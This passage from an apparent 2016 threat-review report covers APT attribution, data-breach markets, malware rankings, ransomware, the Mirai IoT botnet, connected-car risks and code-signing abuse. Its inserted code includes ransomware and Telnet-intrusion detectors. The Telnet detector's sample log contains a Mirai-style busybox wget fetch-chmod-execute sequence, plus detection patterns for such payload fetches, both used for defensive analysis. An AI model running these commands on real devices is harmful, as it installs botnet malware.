According to the report “GRIZZLY STEPPE – Russian Malicious Cyber Activity” [15] released by the U.S. Department of Homeland Security (DHS) and the National Cybersecurity and Communications Integration Center (NCCIC), the attackers used traditional spear-phishing emails and watering hole attacks. The payloads they delivered were Office documents carrying malicious macro code and RTF files that exploited known vulnerabilities to embed malicious code. The malicious code installed on the target host was a conventional remote control tool. With such seemingly ordinary attack equipment and techniques, the attacking organization attempted to influence the political balance by unilaterally revealing information. Just as force in physics has three elements (magnitude, direction, and point of application), seemingly identical attack techniques and methods can produce completely different effects when applied at different points. Therefore, the core of APT judgment remains the operational background and the identification of the attacking organization. It is irresponsible to generalize the concept of APT to non-targeted attacks that merely use advanced means and techniques; an APT judgment made without establishing attack intent and attack will is unreliable.

3. Massive Data Breaches Lead to “Threat Intelligence Misuse”

The Yahoo! data breach involving 500 million accounts was a landmark data breach of 2016, resulting in over 20 class-action lawsuits and the resignation of top executives. However, the breach actually occurred as early as 2014, only coming to light in 2016. This time lag represents a more frightening threat than the large-scale data breach itself: the covert use and sale of vast amounts of personal information, without users’ knowledge.

Although 2016 wasn’t the year with the most leaks in history, the integration of related threats with various traditional forms of crime became more profound. For example, in an attack against the IRS (Internal Revenue Service), attackers compromised the PIN reset application, obtained over 100,000 PINs, and attempted to submit fraudulent tax refund applications. In China, the shocking “Xu Yuyu incident” occurred: her personal information was stolen and sold to fraud gangs, and she died after being defrauded of her tuition fees.

3.1 The Dark Web’s Big Data Has Already Reached a Level Where It Can Create Profiles of Nearly the Entire Population

The cybercrime industry has caused massive data breaches, with these huge amounts of sensitive data constituting the “black market big data”. Besides being used for targeted advertising, this black market big data is also abused by criminals, causing more serious and direct economic losses to internet users. Public service industries such as transportation, healthcare, education, finance, hotels, and logistics hold vast amounts of user information, and because these sectors are closely tied to daily life they are prime targets for the cybercrime industry. Figure 7 summarizes some of the data breaches that occurred in China in 2016, but the actual number of breaches is far greater. Behind all these incidents lies the cybercrime industry. Besides hackers breaching websites and stealing data, other methods used by cybercriminals include credential stuffing attacks, internal employee data theft, phishing websites, and theft by malicious code.

Figure 7 Major Data Breaches in China in 2016

The theft of sensitive user data has become an industry, with clear divisions of labor across various business lines in the black market. These lines collaborate to form a multi-faceted profit chain that harms internet users. At the very top are hackers who possess the attack techniques. They are the most covert group in the entire industry chain, obtaining sensitive user information through vulnerability discovery, website penetration, database breaches, credential stuffing, and even the dissemination of malicious code. They then cleanse the data using various technical means, extracting valuable black market big data, which is then sold to downstream business lines. The midstream of the black market primarily uses the black market big data purchased from upstream to create specialized fraud “scripts”, employing social engineering to carry out specific fraudulent activities or targeted advertising. Downstream are the various peripheral organizations supporting the entire black market industry chain, such as money laundering and withdrawal gangs, card collecting gangs, and ID card selling gangs.

3.2 Threat Intelligence Is Also a Form of Intelligence Threat

Some argue that large-scale data breaches are also a source of threat intelligence, but the awkward part is that this data actually belongs to individual internet users, and its organization is essentially the asset of the breaching party.

Threat intelligence is a shared domain for both attackers and defenders. For example, C&C addresses represent rules and clues for defenders, while for attackers they represent attack resources and traces. The purpose of tracing and attributing security incidents is to characterize the incident, implement targeted defense strategies, and trace attackers or organizations. The key elements used in tracing and attribution technologies are very concretely represented in threat intelligence. The sharing and implementation of threat intelligence provides strong support for more efficient and comprehensive incident tracing. The widespread availability of threat intelligence queries also provides attackers with an entry point to analyze their own exposure and to reverse-analyze defenders. Although threat intelligence providers can perform purposeful analysis on the query data and the query process, this reverse analysis is not yet mature and has not reached industry consensus. Threat intelligence providers cannot clearly distinguish whether their users overlap with attackers. Failure to confine threat intelligence services to the client’s own assets may lead to new forms of targeted attacks.

4. PC Malware Targets Critical Infrastructure, Mobile Malware Is Growing Rapidly, And Ransomware Is Taking Center Stage

In 2016, Antiy captured 1,280 new traditional malware families and 912,279 new variants, covering hundreds of millions of sample hashes. The increase in traditional malware began to slow, while malware targeting mobile and emerging scenarios continued to rise. Meanwhile, the modularity and anti-analysis characteristics of malware samples in APT attacks were further enhanced. Regardless of whether it’s on PC or mobile devices, ransomware will remain a significant threat.

* Note: Since Antiy’s Basic Threat Annual Report and Mobile Threat Annual Report are published separately, the statistics in the Basic Threat Annual Report do not include malicious code for mobile systems.

4.1 The Proportion of Gray Areas Has Increased Further

In the 2016 ranking of the top ten malware families, Grayware and Riskware, which engage in advertising, occupied five spots, while the other five were all Trojan programs. Compared to last year’s TOP 10 list, there was one less Trojan program.

The top-ranked adware family is BrowseFox, a type of adware with legitimate digital signatures that is bundled with free and shareware software. It can infiltrate computers whether the user is aware of it or not. BrowseFox infiltrates all browsers, including Internet Explorer, Google Chrome, and Mozilla Firefox, and then pops up various ads that mainly promote third-party products and services, and even modifies browser settings such as the homepage and default search engine. Finally, BrowseFox collects users’ online browsing history, search terms, and other information, and sends it back to a backend database, where it is analyzed and used to conduct more targeted promotional activities.

Second on the list is the risky software family DownloaderGuide, a professional downloader whose sole purpose is to download other programs to the host. The downloaded and installed programs usually go unnoticed by the user, and they often carry invalid digital signatures with names like “Freemium GmbH”.

The third most problematic software is the LMN family, which uses the BitTorrent protocol to download and install third-party programs locally. These programs may include the Amigo browser, the Unity Web Player browser plugin, and the Russian email client Mail.Ru. Some of these installers do not prompt the user when restarting the system and instead shut down and restart directly, which can affect the user’s normal use of the computer.

The fourth most common type of malware is the generically and automatically named Trojan family Agent.

The fifth most active malware family is IRCbot, which transmits or sends remote control commands through IRC communication channels. Its core behavior is to accept IRC remote control while uploading and downloading files, launching DDoS attacks, etc. It is an early malware family, but it was still very active in 2016.

The sixth most common type of malware is bundled Trojans written in VBS, whose main function is to download other malicious code to the system and run it. In 2016, the payload most frequently downloaded by such VBS, JS, and PowerShell downloaders was the infamous ransomware.

The seventh on the list is the Reconyc Trojan family, which is more like an adware program because its main functions are pop-up ads, browser redirection, and adding browser toolbars or plugins.

The eighth on the list is Dinwod, a Trojan horse program that has the ability to release or bundle malware. After infecting a user’s system, this family of malware will automatically release and install other malicious programs. Many easily detected and removed malware programs hide inside this type of Trojan horse to evade the detection of antivirus software and thus infect the user’s computer. Some variants of this family also have the ability to forcibly shut down antivirus software.

The ninth on the list is OutBrowse, a family of risky software that can download and install risky applications. After running a sample of this family, it downloads and installs an installer called “FLV Player”. After clicking to accept and start the download, an advertising page will pop up, consume system resources, and affect the user experience.

The tenth on the list is ICLoader, a gray software program that can download and install promotional applications. After running, this family of samples connects to the network to download and install promotional applications, consuming system resources and affecting the user’s normal use of the computer.

In the 2016 PC platform malicious code behavior ranking (Hash), advertising behavior aimed at profit once again ranked first. Download behavior, due to its covert and practical characteristics, still had a large number of occurrences. Network propagation behavior and risk tools ranked third and fourth respectively. Overflow behavior rose to fifth place. Although ransomware ranked twelfth in terms of the number of behaviors, the losses it caused were huge. Clearly, ransomware was the most noteworthy malicious behavior in 2016.

Figure 8 Ranking of Malware Behavior Categories on the PC Platform in 2016

4.2 Ransomware Has Evolved from a Form of Malicious Code into an Economic Model

Foreign researcher Danahy [16] attributes the rise of ransomware to two factors: first, more and more criminals are finding this type of attack lucrative; and second, the ease of use and destructive power of ransomware tools, development kits, and services are constantly improving. Antiy researchers add that “the anonymity of Bitcoin payments and anonymous networks also contributes significantly to the covert nature of these crimes” [17].

In 2016, multiple hospitals worldwide were attacked by the SamSam ransomware. After their electronic assets and patient information were encrypted, hospitals were extorted for millions of dollars in ransom, and patients’ health and lives were threatened to varying degrees. This was the first reported large-scale ransomware attack targeting enterprise clients in 2016. The ransomware used attack components built from JBoss vulnerability exploits or other exploit kits to attack enterprise clients. After successfully compromising a terminal computer, it used that computer as a “pivot” to launch semi-automated attacks on the internal network, infecting as many other computers as possible, expanding the amount of encrypted electronic assets, and even encrypting backup assets. The viewpoint raised in Antiy’s “2015 Review and Outlook on Cybersecurity Threats” [18], that “ransomware will become the most direct threat to individual users and even enterprise customers worldwide. In addition to encrypting user files and extorting Bitcoin, ransomware attackers are very likely to launch more targeted attacks to expand their gains, such as combining internal network penetration to threaten more important enterprise data and information”, has been fully verified by the ransomware incidents that occurred in 2016.

Figure 9 From Worm-Based Infection Vectors to Ransomware Infection Vectors

Figure 10 Potential Entry Points for Ransomware to Attack

Antiy CERT created a diagram in 2004 illustrating the mainstream worms and their propagation entry points at the time (the early diagram on the left of Figure 9), which has been cited by many researchers. Although many of these methods have become ineffective under security enhancements such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), problematic older systems certainly still exist. The resurgence of worms driven by ransomware is inevitable, and distribution through existing botnets, propagation through vulnerabilities in emerging IoT scenarios, and the creation of destructive threats will become widespread. Furthermore, based on past incidents, those extorted include not only end users but also manufacturers, after large-scale hijacking of their users.

Ransomware has also brought new challenges to the cybersecurity of domestic government and enterprise networks. For a long time, some domestic government and enterprise organizations have focused their security efforts on easily detectable incidents such as website tampering or DDoS attacks, while often neglecting internal network threats such as data theft and asset breaches, because those attacks are harder to detect. Ransomware, however, targets endpoints, and its consequences are immediately apparent. Furthermore, network-level interception alone is insufficient against such threats; the last line of defense at the endpoint must be strengthened and effective endpoint defense re-emphasized. The Antiy Intelligent Endpoint Protection (IEP) system R&D team, based on its analysis and prediction of ransomware attacks and leveraging Antiy’s antivirus engine and proactive defense kernel, has improved multi-point defense, including whitelisting of document-access processes, monitoring of bulk file tampering, decoy files, and rapid file locking. Through these enhanced functions, Antiy can not only effectively detect and defend against current ransomware samples and destructive mechanisms but also prepare defenses against techniques that ransomware may use in the future. In addition to PC-based protection products, the Antiy Mobile Security Team (AVL TEAM) has conducted extensive forward-looking research on anti-ransomware technology for the Android platform and applied it to the Antiy Mobile Antivirus Engine.
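Added example, not Antiy IEP code: the multi-point defenses just described (a whitelist of document-access processes, bulk-tampering monitoring, decoy files) expressed as rules over a constructed stream of file events, returning the processes that should be locked out of the file system. The event format, paths, process names and thresholds are all assumptions.

```python
"""Endpoint-side ransomware behaviour detection over a stream of file events.

Constructed example for this report, not Antiy IEP code. Three of the
defenses described above are modelled as rules: a whitelist of processes
allowed to modify documents, monitoring of bulk document tampering inside a
short time window, and decoy files that no legitimate process should write.
"""
from collections import defaultdict, deque

DOCUMENT_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".jpg", ".png"}
# Processes permitted to modify many documents (assumed list; a real
# product would derive this from code signing and learned behaviour).
DOCUMENT_WHITELIST = {"winword.exe", "excel.exe", "backup_agent.exe"}
# Decoy files named so that directory enumeration reaches them first.
DECOY_FILES = {
    "C:\\Users\\alice\\Documents\\!0000_decoy.docx",
    "C:\\Users\\alice\\Pictures\\!0000_decoy.jpg",
}
BULK_THRESHOLD = 20      # distinct documents modified by one process ...
WINDOW_SECONDS = 10.0    # ... within this many seconds triggers an alert
MODIFYING_OPS = {"write", "rename", "delete"}


def is_document(path):
    """True when the path's extension is one of the monitored document types."""
    dot = path.rfind(".")
    return dot != -1 and path[dot:].lower() in DOCUMENT_EXTS


def detect(events):
    """Evaluate (timestamp, process, op, path) events in timestamp order.

    Returns {process: sorted reasons} for every process that should be
    locked out of the file system. Reasons are "decoy_access" (a modifying
    operation on a decoy file) and "bulk_tampering" (BULK_THRESHOLD or more
    distinct documents modified inside WINDOW_SECONDS by a non-whitelisted
    process). Read-only operations are ignored.
    """
    recent = defaultdict(deque)    # process -> deque of (ts, path)
    verdicts = defaultdict(set)    # process -> reasons
    for ts, proc, op, path in sorted(events):
        if op not in MODIFYING_OPS:
            continue
        # Decoys are checked before the whitelist: even a trusted process
        # writing a decoy is treated as compromised or abused.
        if path in DECOY_FILES:
            verdicts[proc].add("decoy_access")
        if proc in DOCUMENT_WHITELIST or not is_document(path):
            continue
        window = recent[proc]
        window.append((ts, path))
        while window and ts - window[0][0] > WINDOW_SECONDS:
            window.popleft()
        if len({p for _, p in window}) >= BULK_THRESHOLD:
            verdicts[proc].add("bulk_tampering")
    return {proc: sorted(reasons) for proc, reasons in verdicts.items()}


def sample_events():
    """Constructed event stream: normal editing plus one encrypting process."""
    docs = "C:\\Users\\alice\\Documents\\"
    events = []
    # Word saving three memos over a minute: whitelisted, never counted.
    for i in range(3):
        events.append((i * 20.0, "winword.exe", "write", f"{docs}memo{i}.docx"))
    # Explorer renaming two photos: below the bulk threshold.
    events.append((5.0, "explorer.exe", "rename", f"{docs}a.jpg"))
    events.append((6.0, "explorer.exe", "rename", f"{docs}b.jpg"))
    # An unknown binary rewrites 25 spreadsheets in four seconds and then
    # touches the decoy document.
    for i in range(25):
        events.append((30.0 + i * 0.16, "invoice_2016.exe", "write",
                       f"{docs}report{i}.xlsx"))
    events.append((34.5, "invoice_2016.exe", "write", f"{docs}!0000_decoy.docx"))
    return events


if __name__ == "__main__":
    for proc, reasons in detect(sample_events()).items():
        print(f"lock {proc}: {', '.join(reasons)}")
```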

Money never sleeps. Driven by enormous economic interests, the spread and destructive methods of ransomware will become increasingly complex and difficult to prevent in the future. As the developers of Antiy IEP, we hope to help more users prevent such attacks.

5. IoT Threats Compromise the Security of National Critical Infrastructure, And Connected Vehicle Security Has Emerged as a Key Hotspot of Generalized Threats This Year

In 2013, we used the term “malware/other” to describe the evolution of security threats into new areas such as smart devices, and “generalization” has been an important threat trend that we have been paying attention to ever since.

Currently, the proliferation of security threats has become the norm, but we will still use the same approach as we did in our previous two annual reports on “the proliferation and distribution of cybersecurity threats” to illustrate the situation of threat proliferation in 2016 with a new chart.

5.1 IoT Threats Impact National Infrastructure Security

The Internet of Things (IoT) is a network of intelligent devices with sensing systems that do not require human intervention. In today’s society, IoT exists in every corner of social applications, such as wearable devices, connected vehicles, smart homes, smart cities, and Industry 4.0. When IoT poses a threat, it can affect the entire society regardless of location or industry.

The most impactful security incident of 2016 was undoubtedly the DDoS attack on Dyn, a DNS service provider on the US East Coast, which caused a network outage originating from IoT devices. Dyn confirmed on the morning of the incident that its DNS infrastructure on the US East Coast suffered a DDoS attack originating globally, severely impacting its DNS service customers’ businesses and even rendering their websites inaccessible. The attack lasted until approximately 1:45 PM local time. The services affected by the Dyn attack included Twitter, Etsy, GitHub, Soundcloud, Spotify, Heroku, PagerDuty, Shopify, and Intercom. It was also reported that PayPal, BBC, The Wall Street Journal, Xbox, CNN, HBO Now, Starbucks, The New York Times, The Verge, and the Financial Times were also affected. Dyn stated that the DDoS attack involved tens of millions of IP addresses, a large portion of which originated from IoT and smart devices, and believed the attack originated from malicious code called “Mirai”. Antiy published “IoT Botnets Seriously Threaten Network Infrastructure Security – Analysis and Reflection on the Mirai Trojan DDoS Attack on North American DNS Service Providers”[19], which provides an in-depth analysis of this incident.

At present, the scale of botnets relying on IoT devices is growing. Typical IoT DDoS botnet families include CCTV series, MM series (Chicken MM, number series 10771, 10991, 25000, 36000), BillGates, Mayday, PNScan, gafgyt and many other cross-platform DDoS botnet families based on Linux that appeared in 2013. Antiy’s standard naming of these Trojans is as follows.

Table 5 The Status of IoT Botnet Samples as of the Time of the Mirai Incident

| Family Name | Number of Variants | Number of Sample Hashes |
| --- | --- | --- |
| Trojan[DDoS]/Linux.Mirai | 2 | Greater than 100 |
| Trojan[DDoS]/Linux.Xarcen | 5 | Greater than 1000 |
| Trojan[DDoS]/Linux.Znaich | 3 | Greater than 500 |
| Trojan/Linux.PNScan | 2 | Greater than 50 |
| Trojan[Backdoor]/Linux.Mayday | 11 | Greater than 1000 |
| Trojan[DDoS]/Linux.DnsAmp | 5 | Greater than 500 |
| Trojan[Backdoor]/Linux.Ganiw | 5 | Greater than 3000 |
| Trojan[Backdoor]/Linux.Dofloo | 5 | Greater than 2000 |
| Trojan[Backdoor]/Linux.Gafgyt | 28 | Greater than 8000 |
| Trojan[Backdoor]/Linux.Tsunami | 71 | Greater than 1000 |
| Worm/Linux.Moose | 1 | Greater than 10 |
| Worm[Net]/Linux.Darlloz | 3 | Greater than 10 |

Mirai, which garnered widespread attention in this incident, primarily targets IoT devices, including routers, webcams, and DVRs. As early as 2013, DDoS cybercrime organizations shifted their focus from Windows to Linux for botnet capture, expanding from x86-based Linux servers to IoT devices primarily running embedded Linux. Antiy captured and analyzed numerous malicious samples related to smart devices and routers, and cooperated with relevant authorities to conduct on-site evidence collection on some devices. These devices were mainly based on MIPS and ARM architectures, and due to factors such as default passwords, weak passwords, and unpatched critical vulnerabilities, they were vulnerable to malware implantation by attackers. Because IoT devices are mass-produced and deployed at scale, and because integrators and maintenance personnel in many application scenarios lack sufficient capability, a significant proportion of devices keep their default passwords and are not patched in a timely manner. IoT-targeting DDoS bots such as Mirai exploit exactly this: they primarily brute-force common password patterns over the Telnet port or log in with default passwords. If the Telnet login succeeds, the bot attempts to use embedded tools such as BusyBox to download a DDoS-capable bot via wget, set its executable attribute, and run it to take control of the IoT device. Because CPU instruction architectures differ, some botnets first determine the system architecture and then download a sample built for MIPS, ARM, x86 or another architecture. Once running, the bot receives attack commands and launches attacks. In its earlier follow-up analysis of IoT botnets, Antiy discovered that some models of certain DVR, network camera, and smart router brands shared a single, fixed default password.
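Added example, not Antiy's code: detection logic over a constructed IoT device Telnet log that flags the two behaviours described above for Mirai-class bots, password guessing against the Telnet service and, after a successful login, fetching a payload with BusyBox's wget/tftp applets, marking it executable and running it from /tmp. The log format (one line per login attempt or executed shell command, with passwords not logged), the thresholds and all addresses (taken from the documentation ranges) are assumptions.

```python
"""Stage detection over an IoT device's Telnet access log.

Constructed example for this report, not Antiy's code. Each source address
is scored by the stage it reached: password guessing, successful login,
payload download through BusyBox applets, and execution from /tmp. The
architecture suffix of the fetched file is recorded as a hint that the bot
selected a build for the device's CPU after probing it.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+\.\d+\.\d+\.\d+) (?P<kind>login|cmd) (?P<rest>.*)$")
LOGIN_RE = re.compile(r"user=(?P<user>\S+) result=(?P<result>OK|FAIL)")
# Fetching a file through the BusyBox applets the text mentions.
DOWNLOAD_RE = re.compile(r"\b(?:busybox\s+)?(?:wget|tftp|ftpget)\b")
# Making a file under /tmp executable, or running something from /tmp.
EXEC_RE = re.compile(r"chmod\s+\+?x\s+\S*/tmp/|(?:^|;\s*)/tmp/\S+")
ARCH_RE = re.compile(r"\.(mips|mipsel|arm\w*|x86|sh4|ppc)\b")
BRUTE_THRESHOLD = 5      # failed logins from one source ...
WINDOW_SECONDS = 60      # ... within this many seconds


def parse(line):
    """Split a log line into (unix_ts, source_ip, kind, remainder) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"]).timestamp()
    return ts, m["src"], m["kind"], m["rest"]


def analyze(lines):
    """Return {src: {"stages": [...], "archs": [...]}} for suspicious sources.

    Stages: "brute_force" (BRUTE_THRESHOLD failures inside WINDOW_SECONDS),
    "login" (any successful login), "download" (wget/tftp/ftpget command),
    "execute" (chmod +x on, or execution of, a file under /tmp).
    """
    failures = defaultdict(list)   # src -> timestamps of recent failed logins
    stages = defaultdict(set)      # src -> stages reached
    archs = defaultdict(set)       # src -> architectures of fetched payloads
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, src, kind, rest = rec
        if kind == "login":
            lm = LOGIN_RE.search(rest)
            if lm is None:
                continue
            if lm["result"] == "FAIL":
                failures[src] = [t for t in failures[src]
                                 if ts - t <= WINDOW_SECONDS] + [ts]
                if len(failures[src]) >= BRUTE_THRESHOLD:
                    stages[src].add("brute_force")
            else:
                stages[src].add("login")
        else:
            if DOWNLOAD_RE.search(rest):
                stages[src].add("download")
                archs[src].update(ARCH_RE.findall(rest))
            if EXEC_RE.search(rest):
                stages[src].add("execute")
    return {src: {"stages": sorted(s), "archs": sorted(archs[src])}
            for src, s in stages.items()}


# Constructed log: one bot-like session, one administrator, one slow guesser.
SAMPLE_LOG = """\
2016-10-21T11:00:01 198.51.100.7 login user=root result=FAIL
2016-10-21T11:00:02 198.51.100.7 login user=root result=FAIL
2016-10-21T11:00:03 198.51.100.7 login user=admin result=FAIL
2016-10-21T11:00:04 198.51.100.7 login user=admin result=FAIL
2016-10-21T11:00:05 198.51.100.7 login user=support result=FAIL
2016-10-21T11:00:06 198.51.100.7 login user=root result=OK
2016-10-21T11:00:07 198.51.100.7 cmd cat /proc/cpuinfo
2016-10-21T11:00:08 198.51.100.7 cmd /bin/busybox wget http://203.0.113.9/bins/bot.mips -O /tmp/.x
2016-10-21T11:00:09 198.51.100.7 cmd chmod +x /tmp/.x
2016-10-21T11:00:10 198.51.100.7 cmd /tmp/.x
2016-10-21T11:05:00 192.0.2.10 login user=admin result=OK
2016-10-21T11:05:03 192.0.2.10 cmd cat /var/log/messages
2016-10-21T12:30:00 192.0.2.44 login user=root result=FAIL
2016-10-21T12:45:00 192.0.2.44 login user=root result=FAIL
"""


def report():
    """Run the analysis over the constructed log."""
    return analyze(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for src, info in report().items():
        print(src, "->", ", ".join(info["stages"]), info["archs"])
```

A source that only logged in (the administrator) is reported with a single "login" stage so that the operator can review it, while the slow guesser never reaches the threshold and is not reported at all.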

Figure 11 Attack Mapping of Mirai’s Password-Cracking File Targeting Brand-Specific Default Passwords

IoT devices utilize a wide variety of network protocol technologies to enable information exchange between cyberspace and the physical world. However, IoT itself has the following security vulnerabilities: most IoT devices lack embedded security mechanisms and are mostly outside of traditional IT networks, meaning they are essentially outside the scope of security awareness and cannot respond effectively to problems; most IoT devices are online 24/7, making them a more “stable” attack source than desktop Windows; while Windows, as the mainstream desktop operating system, is constantly improving its memory security capabilities (such as DEP, ASLR, SEHOP), making it increasingly difficult to penetrate Windows through remote open ports, the success rate of remote injection into IoT devices, which generally lack rigorous security design, is much higher.

While DNS is indeed considered by many to be the Achilles’ heel of the internet, the IoT security issues exposed in this large-scale DDoS attack on Dyn’s DNS service deserve even greater attention. IoT botnets are far more than just tools in this attack; the compromised devices themselves possess far greater resource depth value, posing a more serious danger than using them in a DDoS attack. Their widespread vulnerability presents a more insidious and far more damaging risk to social and national security. It’s just that this risk is less easily perceived.

The Internet of Things (IoT) is essentially the internet connecting all things, a crucial foundational support for the future information society. It’s a network extending and expanding upon the internet. Beyond just a network, the IoT utilizes embedded sensors, devices, and systems based on sensing and information technologies to construct complex applications spanning the physical world. Many of these applications utilize critical infrastructure devices vital to people’s livelihoods, including even the foundational sensors for critical industrial control facilities. Therefore, security must be integrated into product design, rather than relying on methods like hardcoding default passwords into firmware or allowing easily bypassed web interfaces. Prioritizing ease of deployment while neglecting security will inevitably leave hidden security threats. The compromised devices themselves possess greater resource depth value, posing a more serious danger than using them for DDoS attacks. Therefore, both national and manufacturer perspectives should strengthen the security protection of IoT devices, increase the cost of attacking and infiltrating IoT devices, and enhance the monitoring and early warning of security threats to IoT devices.

5.2 The Security of the Vehicle Networking System and Intelligent Traffic Safety Will Become a Key Point of Contention

In 2016, connected car security began to receive extraordinary attention. A vulnerability was discovered in Volkswagen vehicles that allowed attackers to gain control of the vehicles through replay attacks on the wireless keys. Security researchers demonstrated that Jeep vehicles could be controlled via the OBD-II interface. Chinese security teams such as Keen Team and 360 disclosed vulnerabilities in Tesla and other vehicles at various geek events.

The automotive industry is a mainstay of the national economy. New energy vehicles, intelligentization, and connectivity are accelerating the industry’s development, spurring the application of technologies such as vehicle networking, autonomous driving, high-precision positioning, and big data, thus catalyzing the “Internet + Automobile” trend. The automotive industry’s development trends in intelligence and connectivity are also driving changes in the automotive electronics industry. From chip and in-vehicle electronic control system suppliers to vehicle infotainment system suppliers, and vehicle networking service providers such as TSPs, new players are entering the market while established players are exiting. The entire automotive electronics industry is entering a reshuffling phase.

Automobiles are a fundamental means of transportation in modern society. While attacks on mobile phones and computers primarily result in the loss of data in cyberspace, potentially impacting property security, attacks on automobiles can threaten personal health and life. Therefore, the automotive industry’s development trends towards intelligent and connected vehicles have raised industry-wide awareness of information security. The industry is shifting from complete disregard for information security to recognizing its importance to brands and future connected car services. In the future, with the government issuing relevant standards, continued exposure of automotive security incidents, ongoing technological innovation by information security companies, and increasing security awareness among car owners, the entire automotive industry will gradually establish and strengthen its security awareness.

Intelligent vehicles face complex risks of direct attack and supply chain security. Direct risks include:

Physical contact: Attacks are carried out through physical contact with the vehicle. The main attack mode is to attack the vehicle’s onboard system by inserting an OBD device into the vehicle.

Near-field communication hijacking: At close range to the vehicle, the attack mainly involves hijacking the corresponding near-field communication protocols such as NFC and Bluetooth to carry out replay attacks. A typical attack is to crack the wireless key and open the car door.

Remote control: This type of attack does not require physical contact or proximity to the vehicle. It achieves the theft of user information or even control of the vehicle by attacking one of the three links of “end-network-cloud”.

Therefore, the overall information security of automobiles inevitably involves “two ends and one cloud” (mobile/vehicle end + vehicle-to-everything (V2X) cloud services). From an attack surface perspective, this includes various security issues related to mobile terminals, vehicle-side infotainment systems, vehicle-side electronic control systems, V2X cloud services, and near-field and long-range communications. Consequently, the information security solutions involved are comprehensive, involving suppliers at various levels, such as in-vehicle security chips, in-vehicle firewalls, in-vehicle infotainment system security hardening, in-vehicle app threat detection and protection, in-vehicle system security OTA upgrades, communication encryption and authentication, mobile app threat detection and protection, and cloud security. Ultimately, in the automotive information security market, the future of V2X security will expand from simple vehicle security to the security of intelligent transportation systems and overall social security. An increasing number of APT attacks aim to impact social security; therefore, intelligent transportation security should be considered under high-intensity confrontation scenarios.
Antiy, currently relying on its solid foundation in threat detection and defense on the intelligent terminal side, is forming a protection system serving the V2X network with “detection + protection + service + perception”.

6. The Battle for Dominance in the Supply Chain Is About to Begin

As the scope of cybersecurity threats expands, supply chain security has become a hot security issue. This focus extends beyond the final link of the supply chain to all the stages in which it is formed. It is noteworthy that attackers may exploit security vulnerabilities at various points in the supply chain, from upstream attacks and supply chain intrusions to underground supply chains, in order to gather information on their targets, pre-position attack payloads, and carry out other pervasive attacks.

6.1 Emerging Devices and Scenarios Become New Entry Points for Attacks

From an IT system perspective, IT equipment, smartphones, smart devices, some product components, and software products sit at the upstream nodes of the supply chain. Compared with other nodes in the supply chain, they are “black boxes” with specific functions whose behavior is difficult to verify. This allows attackers with malicious intent to exploit users without their knowledge. Some manufacturers may embed information collection modules, pre-install backdoors, or reserve debugging interfaces during the R&D phase, leaving attackers with exploitable pathways. Once a successful intrusion occurs, security incidents such as the leakage of important information will follow. Because these products can act directly on the physical world, the resulting losses can be incalculable. In addition, default passwords and hard-coded security parameters in hardware products also create security vulnerabilities.

The rapid development and application of smart devices are changing how people learn, work, and entertain themselves, but they also bring numerous security risks. Beyond the inherent security flaws and incidents of the smart devices themselves, these emerging devices and scenarios can become new entry points for attacks. Unlike traditional IT systems, they not only have inadequate built-in security mechanisms but also lie largely outside the coverage of existing security protection and early-warning systems. This provides attackers with new entry points, such as access to poorly regulated, physically isolated networks to which these emerging devices are connected.

6.2 The Code-Signing System Has Been Compromised

The code-signing system has long served as a core mechanism for ensuring the integrity and non-repudiation of the software supply chain. In the early days, most mainstream antivirus programs adopted a policy of automatically trusting programs with valid certificates. The issue of certificate theft began to attract widespread attention following APT incidents such as Stuxnet. In the 2015 Duqu 2.0 attack on Kaspersky [21], the malicious code misused a certificate belonging to Foxconn.

Figure 12 Time to Disclosure of Security Incidents Related to Digital Signatures and Certificates in Recent Years

However, malicious code with “legitimate” signatures is no longer the sole domain of APT attacks. Statistics from 2016 show that nearly one-fifth of Windows PE malware had digital signatures, and more than one-fifth of these digitally signed Windows PE malware possessed verifiable digital signatures. A large number of these certificates were not obtained through theft but rather through legitimate application processes.

Even more dangerous is that Android has always relied on self-signed certificates and has never established a unified certificate authentication and management mechanism. The Antiy Mobile Security Team (AVL TEAM) has detected multiple incidents of malicious code signed with certificates belonging to well-known vendors, raising the possibility that those vendors’ app signing certificates have been stolen. Furthermore, developers have been found to sync their private signing keys to GitHub.

In people’s minds, certificate security is mostly a matter of algorithms; for example, the impact of hash algorithm security on certificates is often discussed. However, as we have repeatedly pointed out, “without endpoint system security as a guarantee, encryption and authentication will become pseudo-security”. While the design of the cryptographic protocols behind certificates is important, it is not enough to guarantee the security of the certificate system. Unfortunately, the existing code-signing certificate system, represented by the Windows PE format, was established before endpoint data theft became mainstream. In this system, the security of the certificate issuance environment, the unified management and revocation of certificates, and the system security of the certificate authority itself have not received sufficient attention.
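As an added illustration of the two points above (it is not code from this report or from Antiy), the following Go program mints two self-signed certificates carrying the same vendor name, the way an Android app signing certificate is produced with no CA behind it, and compares a policy that trusts the vendor name with one that pins the key fingerprint and honours a stolen-key list. The vendor name, the pinning table and the revocation set are constructed for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"fmt"
	"math/big"
	"time"
)

// Verdict records what two trust policies say about one certificate.
type Verdict struct {
	BySubject   bool // trust any self-signed cert whose subject names a known vendor
	ByPinnedKey bool // trust only the fingerprint recorded for that vendor, minus revoked keys
}

// newSelfSigned mints a self-signed certificate for the given Common Name,
// as an Android signing certificate is made: nobody vouches for the name.
func newSelfSigned(cn string) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: cn},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(10 * 365 * 24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// selfSignatureValid checks only that the certificate is signed by its own key,
// which is all a self-signed certificate can prove about itself.
func selfSignatureValid(c *x509.Certificate) bool {
	return c.CheckSignature(c.SignatureAlgorithm, c.RawTBSCertificate, c.Signature) == nil
}

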